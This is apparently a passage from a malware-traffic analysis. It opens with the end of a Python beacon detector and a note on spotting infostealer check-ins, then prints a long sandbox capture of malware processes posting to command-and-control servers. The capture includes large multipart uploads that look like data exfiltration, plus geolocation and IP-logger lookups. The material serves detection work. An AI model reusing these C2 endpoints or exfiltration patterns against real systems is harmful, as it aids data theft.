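            groups[(r["method"], r["url"])].append(r)
    hits = []
    for (method, url), recs in groups.items():
        if len(recs) < min_count:
            continue
        times = sorted(parsedate_to_datetime(r["resp"]["date"]).timestamp() for r in recs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        med = median(gaps)
        # Reject groups whose spacing drifts more than max_jitter from the median.
        if med <= 0 or max(abs(g - med) for g in gaps) / med > max_jitter:
            continue
        sizes = {r["req"].get("content-length") for r in recs}
        hits.append({
            "method": method,
            "url": url,
            "count": len(recs),
            "interval_s": med,
            "body_bytes": int(next(iter(sizes))) if len(sizes) == 1 and None not in sizes else None,
            "cf_challenged": all(
                r["status"] == 403 and r["resp"].get("cf-chl-bypass") == "1" for r in recs
            ),
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_records(SAMPLE_LOG)):
        print(hit)
```

The detector keys on (method, URL) and constant body size because those are what this family keeps fixed between check-ins; in production logs the same grouping applies to proxy or Zeek http.log fields (method, host, uri, request_body_len, ts). The cf_challenged flag is there so an analyst does not close the case on "it got 403": a challenge page means the infostealer's report was dropped in transit, and the same host should still be blocked and hunted for across the estate.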
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 398
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:30:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b99fd900007cac2a167000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=NcUUm5vhg8JzrygnS%2BWMsk5kfcAxBIze1K71x3ni985kdjb5rJMcBAmUjFF8zxIscj7OQwts5UCeg99oWn8fvtXrNTCtUIfbxeZcVLcs58UpuGuhSSWczU6XvfCteQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862bac88827cac-MUC
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:30:55 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8

POST
http://185.215.113.55/t5BnOoke2/index.php?scr=1
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----404eba467fa0966a2c841a83dae417b0
Host: 185.215.113.55
Content-Length: 89462
Cache-Control: no-cache

GET
http://ip-api.com/json/?fields=8198
SystemNetworkService
Remote address:
208.95.112.1:80
Request
GET /json/?fields=8198 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: ip-api.com
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:30:55 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 59
Access-Control-Allow-Origin: *
X-Ttl: 1
X-Rl: 37

POST
http://iw.gamegame.info/report7.4.php
SystemNetworkService
Remote address:
104.21.21.221:80
Request
POST /report7.4.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Host: iw.gamegame.info
Content-Length: 254
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 403 Forbidden
Date: Fri, 02 Jul 2021 07:30:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Chl-Bypass: 1
Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
X-Frame-Options: SAMEORIGIN
cf-request-id: 0b07b9c8b400000bf131385000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=OlHABUhX22Wl5BNyDbB6Pm%2BQahQS7NrOFyfJE4dMyyn9VB3J1t0jiN%2FpJUuvFrdwbep%2FdrR6kVG7ENPM5Sd2Ucs3DUhDeTWgmu%2BNBlsozfWCC6HMmqHjlHzvOxCPGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66862bedeca40bf1-AMS
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache

POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:33:27 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----ec01b39d03ce886c2c15019bf5bdd886
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 89453
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:34:28 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        www.facebook.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        star-mini.c10r.facebook.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        31.13.64.35
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        31.13.64.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1f2RkyCpEznlERiEg..Bg3sG6.kQ.AAA.0.0.Bg3sG6.AWX7RIB9AD8; expires=Thu, 30-Sep-2021 07:35:21 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=usHeYOCtX59FzkqRtgNApvnc; expires=Sun, 02-Jul-2023 07:35:22 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Alt-Svc: h2="facebook2b5efqy23fbcbpzs5xkfqfuwjc3csaqqvkggj3pkwkb25aid.onion:443"; ma=86400
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: 6U6rniBlzsGrK5KcCbsVbH83ND6d03mwzdGxsnbsMpl84FdvHs/PrW2hrq/AP/G/EDz1E1iA/ij209d/yEHIqQ==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:22 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=297807&key=6f62acb440fd1c860856850e882a0027
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=297807&key=6f62acb440fd1c860856850e882a0027 HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:25 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:35:29 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----b4f9264d6c20410f2827fcb869e0c042
Host: 185.215.113.55
Content-Length: 89449
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Date: Fri, 02 Jul 2021 07:37:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

POST
http://185.215.113.55/t5BnOoke2/index.php
nrbux.exe
Remote address:
185.215.113.55:80
Request
POST /t5BnOoke2/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.55
Content-Length: 84
Cache-Control: no-cache

DNS
www.facebook.com
chrome.exe
Remote address:
8.8.8.8:53
Request
www.facebook.com
IN A
Response
www.facebook.com
IN CNAME
star-mini.c10r.facebook.com
star-mini.c10r.facebook.com
IN A
31.13.83.36

GET
https://www.facebook.com/
jooyu.exe
Remote address:
31.13.83.36:443
Request
GET / HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Host: www.facebook.com
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: fr=1cVWn5AhVnGHoF6bp..Bg3sI0.29.AAA.0.0.Bg3sI0.AWUXKEC1qo0; expires=Thu, 30-Sep-2021 07:37:23 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
Set-Cookie: sb=NMLeYMGZSg_rrxr_Z9h673xq; expires=Sun, 02-Jul-2023 07:37:24 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
x-fb-rlafr: 0
Alt-Svc: h2="facebook266ixdylqbalcxb5hsq5n2g633knuxllgzg2gkqe7bligvqd.onion:443"; ma=86400
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
X-Frame-Options: DENY
Strict-Transport-Security: max-age=15552000; preload
Content-Type: text/html; charset="utf-8"
X-FB-Debug: Yl+xON3cXWlAW8Q0MSaSzqz2b60qmuV2Cr/Bq3VzwtdOTBUH6133zDrmey2HbBK3UKGRDB5hOci0eLNzQRC3kA==
Date: Fri, 02 Jul 2021 07:37:24 GMT
Transfer-Encoding: chunked
Connection: keep-alive

POST
http://87.251.71.195:82/
arnatic_7.exe
Remote address:
87.251.71.195:82
Request
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
Host: 87.251.71.195:82
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

GET
http://uyg5wye.2ihsfa.com/api/fbtime
jooyu.exe
Remote address:
88.218.92.148:80
Request
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:37:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21

POST
http://uyg5wye.2ihsfa.com/api/?sid=298539&key=366454b36c6152980d512ef63d850b04
jooyu.exe
Remote address:
88.218.92.148:80
Request
POST /api/?sid=298539&key=366454b36c6152980d512ef63d850b04 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uyg5wye.2ihsfa.com
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:37:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.21

DNS
iplogger.org
chrome.exe
Remote address:
8.8.8.8:53
Request
iplogger.org
IN A
Response
iplogger.org
IN A
88.99.66.31

GET
https://iplogger.org/18hh57
jooyu.exe
Remote address:
88.99.66.31:443
Request
GET /18hh57 HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: iplogger.org
Response
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Jul 2021 07:37:28 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=tmtossrqagtssoauhecqit6dg6; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.220.101.21; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253836743; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
